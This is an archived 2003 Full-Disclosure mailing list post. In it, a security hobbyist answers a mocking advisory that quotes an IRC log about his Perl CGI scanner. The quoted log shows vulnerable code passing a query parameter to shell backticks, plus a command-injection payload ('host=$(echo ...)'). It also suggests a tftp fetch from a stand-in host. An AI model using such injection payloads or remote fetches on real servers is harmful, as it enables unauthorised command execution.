lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <Law11-OE23PJqfFkFKz0004248a@hotmail.com> From: se_cur_ity at hotmail.com (morning_wood) Subject: Wood's Infinity Project 3.69a Remote Command Execution 1. that script is only a modification of a previous script , or do you not read the read me? 2. Boinet logger is not mine either, again. I dont get what your point is testing software that isnt mine? 3. My contact with a company that I contacted is party of why I chose to start my open project. You are trying to discredit me, I see you only making yourself look bad, shame, I thought you of all people here would think twice before making erouneous statements. wood ----- Original Message ----- From: "badpack3t" <badpack3t@...urity-protocols.com> To: <full-disclosure@...ts.netsys.com> Sent: Thursday, June 12, 2003 3:49 PM Subject: [Full-Disclosure] Wood's Infinity Project 3.69a Remote Command Execution > This advisory is for "Wood's Infinity Project 3.69a" avaliable at: > http://exploit.wox.org/thecore/W-infscan-369a.zip > > [17:10] * Now talking in #morning_wood > [17:10] * Topic is '' > [17:10] * Set by ChanServ on Wed Jun 11 04:19:51 > [17:10] <b0iler> morning_wood knows security well? > [17:10] <b0iler> I need help. > [17:11] <b0iler> is this morning_wood? > [17:15] <{DWL}Vinyl> ya > [17:15] <{DWL}Vinyl> wassup > [17:15] <b0iler> you are any good at perl security? > [17:16] <{DWL}Vinyl> some ya > [17:16] <b0iler> I need help varifying if this vuln is exploitable. > [17:16] <{DWL}Vinyl> hey > [17:16] <{DWL}Vinyl> can you > [17:16] <{DWL}Vinyl> go to > [17:17] <{DWL}Vinyl> exploitlabs.com:6667 > [17:17] <{DWL}Vinyl> .#0sec > [17:17] <{DWL}Vinyl> it my server > > [17:17] * Now talking in #0sec > [17:17] * Topic is 'http://nothackers.org - 0day - Freedom of Voice - > Freedom of Choice' > [17:17] * Set by MrWood on Tue Jun 10 22:13:11 > [17:17] <#0sec> Welcome to 0sec > [17:18] <b0iler> @values = split(/\&/,$ENV{'QUERY_STRING'}); > [17:18] <b0iler> foreach $i (@values) { > [17:18] <b0iler> ($varname, $mydata) = split(/=/,$i); > [17:18] <b0iler> $FORM{$varname} = $mydata; > [17:18] <b0iler> } > [17:18] <b0iler> $host = "$FORM{'host'}"; > [17:18] <b0iler> $host =~ tr/+/ /; > [17:18] <b0iler> $host =~ tr/\%/a/; > [17:18] <b0iler> $host =~ tr/\;/b/; > [17:18] <b0iler> $host =~ tr/</c/; > [17:19] <b0iler> $host =~ tr/>/d/; > [17:19] <b0iler> $host =~ tr/\|/e/; > [17:19] <b0iler> $host =~ tr/\&/f/; > [17:19] <b0iler> $host =~ tr/\^/g/; > [17:19] <b0iler> $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", > hex($1))/eg; > [17:19] <b0iler> $hostname = `$nslookuplocation $host`; > [17:19] <MrWood> shell code? > [17:19] <b0iler> ? > [17:19] <b0iler> .cgi?host=$(echo 'h0n0!') > [17:19] <MrWood> hehe > [17:19] <b0iler> that would execute commands on this server.. right? > [17:20] <MrWood> you want to run this on a remote server? > [17:20] <b0iler> this is in a .cgi > [17:20] <MrWood> havin the .pl on it first > [17:20] <MrWood> ? > [17:20] <b0iler> I want to find vulnerabilities in this .cgi > [17:20] <b0iler> I believe this is one. > [17:20] <MrWood> ahhh > [17:20] <b0iler> you see.. the programmer of this .cgi is not very > knowledgble. > [17:20] <MrWood> do you have a httpd with perl? > [17:21] <b0iler> I think they have problems in their code. > [17:21] <MrWood> if you uploaded the cgi to me > [17:21] <MrWood> i could let you access it on my box, but i run NT > [17:22] <MrWood> wtf is $host =~ > s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; > [17:22] <b0iler> that is converting url encoding into ascii > [17:22] <b0iler> %hexhex into ascii > [17:22] <MrWood> isint that hex for a serial port? > [17:23] <b0iler> MrWood: you already have the .cgi. > [17:23] <MrWood> i do? > [17:23] <b0iler> it is nph-exploitscanget.cgi > [17:23] <b0iler> you programmed it. > [17:23] <MrWood> where? > [17:23] <MrWood> url? > [17:23] <b0iler> http://exploit.wox.org/thecore/W-infscan-369a.zip > [17:24] <MrWood> the worst is' > [17:24] <MrWood> oon that > [17:24] <MrWood> there is a call > [17:24] <MrWood> to local nslookup > [17:24] <MrWood> if you replace > [17:24] <MrWood> 'nslookup' > [17:24] <MrWood> with ummm > [17:24] <MrWood> lets say > [17:25] <MrWood> tftp - yourhost.com get file.ext file.ext > [17:25] <MrWood> it should execute local > [17:25] <MrWood> :) > [17:25] <b0iler> what you say makes no sense at all. > [17:26] <MrWood> if you replace that call > [17:26] <MrWood> then upload it to remote server > [17:27] <b0iler> and get... *gasp* cgi privedges on a local server. lol. > [17:27] <MrWood> it will execute the call you replaced when the script > hits that functionm > [17:27] <MrWood> yes > [17:27] <b0iler> I will be posting this log to FD list. > [17:30] <b0iler> your security list is a joke. your website is a joke. > your code is a joke. > [17:30] <MrWood> i have 3 advisorries on hold > [17:30] * Disconnected (Quit: joke.) > > There is a massive xss problem in the 404 script mrwood uses. here is PoC > for this 0day advisory: http://exploit.wox.org/<b>a</b> > There is a serious plain text password and default password problem in the > script avaliable at: http://take.candyfrom.us/bionet-logger1 > -2.zip > > There is also an advisory on 0day (http://nothackers.org) list's use of > it's own "wood-discloser" (some kind of strange full-discloser > mutation with no vendor notification, no exploit code, flakey > vulnerabilities, and "0days" which do not compile - they only form struct > ures of poorly written English sentances). It claims it releases > information immediately, but as the log shows mrwood himself is withh > olding vulnerability information from the public. According to mrwood's > own logic, this is putting 10trillion,billion,million people a > t risk from 0days and attack. Wood-discloser will save us all from > attack! Praise Ali! > > peace out, > > --------------------------- > badpack3t > founder > www.security-protocols.com > --------------------------- > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists